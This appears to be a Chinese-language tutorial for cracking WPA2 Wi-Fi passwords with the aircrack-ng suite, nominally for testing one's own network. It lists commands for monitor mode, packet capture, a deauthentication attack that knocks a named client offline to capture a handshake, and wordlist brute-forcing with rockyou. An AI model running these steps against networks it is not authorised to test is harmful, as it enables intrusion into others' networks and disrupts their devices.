1. 执行以下命令查看电脑设备
iwconfig
2. [监听]附近网络:
airmon-ng start wlan0
3. 扫描附近的网络,开启监听模式后无线网卡无法继续连接 wifi,使用后需要关闭监听模式
airodump-ng wlan0mon
airodump-ng wlan1
破解主要用到的 BSSID 以及 CH;
这一步会输出两个列表,两个列表不停在刷新。
第一个列表表示扫描到的无线网络 AP 信息,会用到以下几列信息:
BSSID: 无线 AP 的硬件地址
PWR: 信号强度,值是负数,绝对值越小表示信号越强
CH: 无线网络信道
ENC: 加密方式,我们要破解的是 WPA2
ESSID: 无线网络的名称
第二个列表表示某个无线网络中和用户设备的连接信息:
BSSID: 无线 AP 的硬件地址
STATION: 用户设备的硬件地址
扫描列表会不停刷新,确定最终目标后按 Ctrl+C 退出。
4. 开始抓包,对自家 wifi 进行测试;使用命令:airodump-ng –bssid BSSID -c 信道频率 -w 抓包存储的路径 wlan0mon(本机是 wlan1)
airodump-ng --bssid DC:FE:18:AE:12:3A -c 1 -w /home/wifi wlan1 #信道1
station:链接的设备物理地址
5. 打开一个新的终端,开始对目标设备发起攻击,使用命令:aireplay-ng -<攻击模式> < 攻击次数 > -a 无线 AP 硬件地址 > -c < 用户设备硬件地址 > < 处于监听模式的网卡名称 >
对应会生成如图文件,在 /home/wifi 下:
aireplay-ng -0 0 -c F8:A2:D6:B9:13:C5 -a DC:FE:18:AE:12:3A wlan1
拿到握手包后按 Ctrl+C 结束扫描即可。
6. 开始暴力破解 wifi 密码,使用命令:aircrack-ng -w 密码字典 <包含握手包的 cap 文件>
aircrack-ng -w /usr/share/wordlists/rockyou.txt /home/wifi-01.cap
7. 信号更换命令:
iwconfig wlan1 channel 7
推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
还没有评论,来说两句吧...